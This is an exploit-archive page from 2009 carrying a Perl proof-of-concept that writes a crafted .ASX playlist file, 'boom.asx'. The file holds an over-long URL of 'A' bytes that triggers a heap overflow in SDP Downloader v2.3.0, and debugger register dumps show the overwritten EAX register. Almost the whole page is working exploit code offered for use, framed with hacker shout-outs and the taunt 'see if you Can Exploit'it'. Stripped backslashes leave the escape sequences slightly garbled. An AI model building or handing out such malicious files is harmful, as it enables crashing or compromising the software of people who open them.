SDP Downloader v2.3.0 (.ASX File) Local Heap Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SDP Downloader v2.3.0 (.ASX File) Local Heap Overflow PoC
# Published : 2009-04-24
# Author : Cyber-Zone
# Previous Title : iodined <= 0.4.2-2 (forged DNS packet) Denial of Service Exploit
# Next Title : HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos (meta)

#!/usr/bin/perl
#
#
# Found By : Cyber-Zone (ABDELKHALEK) <== Proud To Be Figuigian ::Figuig City OwnZ !
#
# MoroCCo 2009
#
# GreatZ To : Hussin X , Jiko , ZoRLu , Mag!c ompo , Stack , b0rizQ ... All MoroCCaN HaCkerS
#
#OllyDBG Registers
#EAX 41414141
#ECX 00AF74AC ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDX 00502F58 SDP.00502F58
#EBX 00000041
#ESP 0012F798
#EBP 0012FAA4
#ESI 0000021D
#EDI 0012FA7C
#EIP 004208C2 SDP.004208C2
#
if(@ARGV < 2)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP :d n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 n";
}
($HackerName, $IP) = @ARGV;
print("Please Wait ....................................n");
sleep(5);
print("SDP Downloader v2.3.0 .ASX File Local Heap Overflow PoCnn");
print("Ok $HackerName , Your Evil ASX file Has Been Created !!!n");
print("Your IP Is : $IP , Now Open The EviL File whith Our Targer Program And see if you Can Exploit'itn");

my $EviLFILE="boom.asx";

my $Header1= "x3Cx41x53x58x20x56x45x52x53x49x4Fx4Ex3Dx22x33".
            "x2Ex30x22x3Ex0Ax0Ax3Cx45x4Ex54x52x59x3Ex3Cx54".
            "x49x54x4Cx45x3Ex65x78x70x6Cx6Fx69x74x3Cx2Fx54".
            "x49x54x4Cx45x3Ex0Ax3Cx52x45x46x20x48x52x45x46".
            "x3Dx22";
                        

my $ProofOfConcept ="http://".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41"; #530

my $Header2= "x2Ex61x73x66x22x2Fx3Ex0Ax3Cx2Fx45x4Ex54x52x59".
            "x3Ex3Cx2Fx41x53x58x3E";
            
            
open(Boom, ">$EviLFILE") or die "ERROR ! :$EviLFILEn";
print Boom $Header1;
print Boom $ProofOfConcept;
print Boom $Header2;

close(Boom);

print ("Figuigian Hacker !!!n");

# www.Syue.com [2009-04-24]